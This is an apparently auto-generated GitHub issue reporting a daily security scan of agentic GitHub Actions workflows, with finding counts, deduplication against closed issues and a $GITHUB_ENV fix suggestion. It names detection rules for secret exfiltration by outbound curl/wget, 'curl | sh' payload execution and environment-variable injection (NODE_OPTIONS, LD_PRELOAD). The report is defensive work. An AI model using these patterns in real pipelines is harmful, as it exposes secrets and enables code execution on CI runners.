[static-analysis] Report - 2026-06-09

[github-actions]

🔍 Static Analysis Report — 2026-06-09

Daily scan of 247 compiled agentic workflows with zizmor, poutine, actionlint, and runner-guard. Totals are essentially flat versus the last scan (2026-06-07): runner-guard unchanged at 314, poutine unchanged at 24, zizmor down 1, actionlint up 27 — the increases track the +4 newly-added workflows rather than new vulnerability classes. No new GitHub issues were created: every Critical/High runner-guard finding maps to an already‐closed issue for the same rule + file (see Runner‐Guard Analysis).

Findings by Tool

Tool	Total	Critical	High	Medium	Low	Info
zizmor (security)	74	0	1	2	31	40
poutine (supply chain)	24	0	0	0	24	—
actionlint (linting)	1524	—	—	—	—	—
runner-guard (taint)	314	0	304	10	—	—

• Workflows scanned: 247
• Workflows with runner-guard findings: 11
• Issues created this run: 0 (all High findings are duplicates of closed issues)

Top Priority Issues

1. RGS-004 — Comment-Triggered Workflow Without Author Authorization Check

• Tool: runner-guard · Severity: High · Count: 288 (across 3 workflows)
• Affected: q.lock.yml (118), dev-hawk.lock.yml (87), ai-moderator.lock.yml (83)
• Impact: Comment/workflow_run-triggered jobs with write permissions or secret access that don't gate on github.event.comment.author_association. Already triaged and closed under [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check #29883 (lists q, dev-hawk, ai-moderator), [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check (16 workflows) #30284, [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check #30077.

2. zizmor github-env (High) — dangerous use of environment file

• Tool: zizmor · Severity: High · Count: 1
• Affected: dev-hawk.lock.yml:1714 — persistent ~18 consecutive days since 2026-05-23
• Impact: Writing dynamic values to $GITHUB_ENV can inject env vars (NODE_OPTIONS, PATH, ...) into later steps. The only genuinely persistent High finding not covered by a per-file issue; recommend fixing at the compiler/source .md level.

3. RGS-012 / RGS-018 (High) — secret exfiltration & suspicious payload patterns

• Tool: runner-guard · Severity: High · Count: 10 + 6
• Affected (RGS-012): daily-byok-ollama-test, daily-model-inventory, daily-multi-device-docs-tester, docs-noob-tester, visual-regression-checker
• Affected (RGS-018): copilot-setup-steps, daily-byok-ollama-test, daily-cli-performance, daily-sentrux-report, smoke-claude, smoke-codex
• Impact: Outbound curl/wget to non-GitHub domains in secret-bearing jobs (RGS-012) and curl | sh install patterns (RGS-018). All covered by closed issues (see below).

Clustered Findings by Tool and Type

Zizmor Security Findings

Issue Type	Severity	Count	Notes
template-injection	Informational	39	code injection via template expansion
obfuscation	Low	27	${{ '' }} placeholder pattern in generated lock files
template-injection	Low	4	—
github-env	High	1	dev-hawk.lock.yml:1714 (persistent)
excessive-permissions	Medium	1	dependabot-repair.lock.yml:381
artipacked	Medium	1	daily-geo-optimizer.lock.yml:1514
superfluous-actions	Informational	1	smoke-codex.lock.yml:2190

Poutine Supply Chain Findings

Issue Type	Severity	Count	Affected Workflows
untrusted_checkout_exec	error (Low)	12	smoke-workflow-call, smoke-workflow-call-with-inputs, dependabot-worker (4 each)
github_action_from_unverified_creator_used	note	8	smoke-codex, mcp-inspector, link-check, super-linter, hippo-embed, dataflow-pr-discussion-dataset, copilot-setup-steps
unverified_script_exec	note	3	smoke-codex (trufflehog), daily-byok-ollama-test (ollama), copilot-setup-steps
pr_runs_on_self_hosted	warning	1	smoke-copilot-arm

Actionlint Linting Issues

Issue Type	Count	Notes
shellcheck	975	mostly SC2016 / SC2086 in generated run: blocks
syntax-check	410	queue: max under concurrency + unexpected keys (gh-aw feature actionlint doesn't model)
permissions	117	unknown scope copilot-requests (valid GitHub scope, not yet in actionlint)
expression	22	undefined property refs in if: conditions

Note: the bulk of actionlint and zizmor obfuscation findings are artifacts of gh-aw's own generated .lock.yml output (newer GitHub features actionlint doesn't recognize, intentional ${{ '' }} placeholders) rather than authored vulnerabilities.

Runner-Guard Taint Analysis Findings

Runner-Guard Score: not emitted by scanner this run. High: 304 · Medium: 10.

Rule ID	Name	Severity	Count	Affected Workflows
RGS-004	Comment-Triggered Workflow w/o Author Auth Check	High	288	q, dev-hawk, ai-moderator
RGS-012	Secret Exfiltration via Outbound HTTP Request	High	10	daily-byok-ollama-test, daily-model-inventory, daily-multi-device-docs-tester, docs-noob-tester, visual-regression-checker
RGS-018	Suspicious Payload Execution Pattern	High	6	copilot-setup-steps, daily-byok-ollama-test, daily-cli-performance, daily-sentrux-report, smoke-claude, smoke-codex
RGS-005	Excessive Permissions on Untrusted Trigger	Medium	8	agentic_commands, ai-moderator, q
RGS-019	Step Output Interpolated in run Block	Medium	1	error-message-lint
RGS-007	Unpinned Third-Party Action Using Mutable Tag	Medium	1	aoai-endpoint-smoke-test

Issues created: none — see Runner-Guard Analysis for deduplication rationale.

Runner-Guard Analysis

All High-severity runner-guard findings were checked for existing GitHub issues (open and closed) by rule ID + affected file. Every one maps to an already-closed [static-analysis] issue, so per the deduplication policy (closed rule+file → skip) no new issues were created and no comments were posted (no open issues exist).

Rule + File	Closed issue(s) covering it
RGS-004 · q / dev-hawk / ai-moderator	#29883 (explicit file list), #30284, #30077, #29460
RGS-012 · daily-byok-ollama-test	#35652, #30534
RGS-012 · daily-model-inventory	#30079, #30776
RGS-012 · daily-multi-device-docs-tester	#33477
RGS-012 · docs-noob-tester / visual-regression-checker	#29885, #30947
RGS-018 · copilot-setup-steps	#33476
RGS-018 · daily-byok-ollama-test	#35653
RGS-018 · daily-cli-performance / daily-sentrux-report / smoke-claude / smoke-codex	#29461 (36 wf), #30777 (35 wf), #30078 (37 wf), #30532 (34 wf)

This recurring create-then-close cycle is itself documented in closed meta-issue #31043 ("Static-analysis RGS-* security issues recreated daily after closure (no dedup-by-rule)"). Honoring that, this run created 0 issues.

Fix Suggestion — zizmor github-env (High, persistent)

Issue: Dangerous write to $GITHUB_ENV in dev-hawk.lock.yml:1714 (persistent ~18 days).
Severity: High · Affected: 1 workflow (source .md / compiler template).

Prompt to Copilot Agent:

You are fixing a HIGH severity finding identified by zizmor (rule: github-env —
(docs.zizmor.sh/redacted)

Vulnerability: A `run:` step writes a dynamically-computed value to `$GITHUB_ENV`.
If that value is attacker-influenced or contains newlines, an attacker can inject
additional environment variables (NODE_OPTIONS, LD_PRELOAD, PATH) into later steps,
leading to code execution.

Required fix:
1. Prefer step OUTPUTS scoped to a step id over global env injection.
2. If $GITHUB_ENV is required, sanitize the value (strip newlines) and write with a
   random heredoc delimiter; never interpolate untrusted ${{ ... }} directly.

Before:
  echo "VALUE=$(some_command)" >> "$GITHUB_ENV"

After:
  {
    echo "value<<__EOF__"
    some_command
    echo "__EOF__"
  } >> "$GITHUB_OUTPUT"

Because dev-hawk is a compiled .lock.yml, apply the fix in the source .md / shared
include that generates the offending step, then recompile.

Historical Trends

Date	Workflows	zizmor	poutine	actionlint	runner-guard
2026-06-07	243	75	24	1497	314
2026-06-09	247	74	24	1524	314
Δ	+4	−1	0	+27	0

• New issue types: none.
• Resolved issue types: none — the same rule classes persist.
• Persistent High finding: zizmor github-env on dev-hawk (~18 consecutive days since 2026-05-23) — the one item worth a durable source-level fix.

Recommendations

1. Immediate: Fix the persistent zizmor github-env High in the dev-hawk source workflow / compiler template (only genuinely-actionable, unresolved High).
2. Short-term: Decide a policy for the recurring RGS-004/012/018 closed issues — either accept-and-suppress at the scanner config level or add author_association gating to q, dev-hawk, ai-moderator, so the scan stops re-flagging them.
3. Tooling: Most actionlint (queue, copilot-requests) and zizmor obfuscation findings are gh-aw-generated-output artifacts — consider an allowlist/suppression so signal isn't drowned by ~1500 known-benign lines.
4. Prevention: Keep the rule+file dedup against closed issues (this run honored it: 0 created) to avoid the [deep-report] Static-analysis RGS-* security issues recreated daily after closure (no dedup-by-rule) #31043 daily-recreation churn.

Next Steps

• Apply the github-env source fix for dev-hawk
• Triage policy for RGS-004/012/018 recurring closures (suppress vs. fix)
• Add actionlint/zizmor suppressions for known gh-aw generated patterns
• Keep closed-issue dedup to prevent issue churn

References:

• §27187013474

Generated by 📊 Static Analysis Report · 274.6 AIC · ⌖ 35.5 AIC · ⊞ 10.2K · ◷

• expires on Jun 15, 2026, 10:13 PM UTC-08:00

[github-actions]

This issue is being closed as outdated. A newer issue has been created: #38292

View newer issue

---

This action was performed automatically by the Static Analysis Report workflow.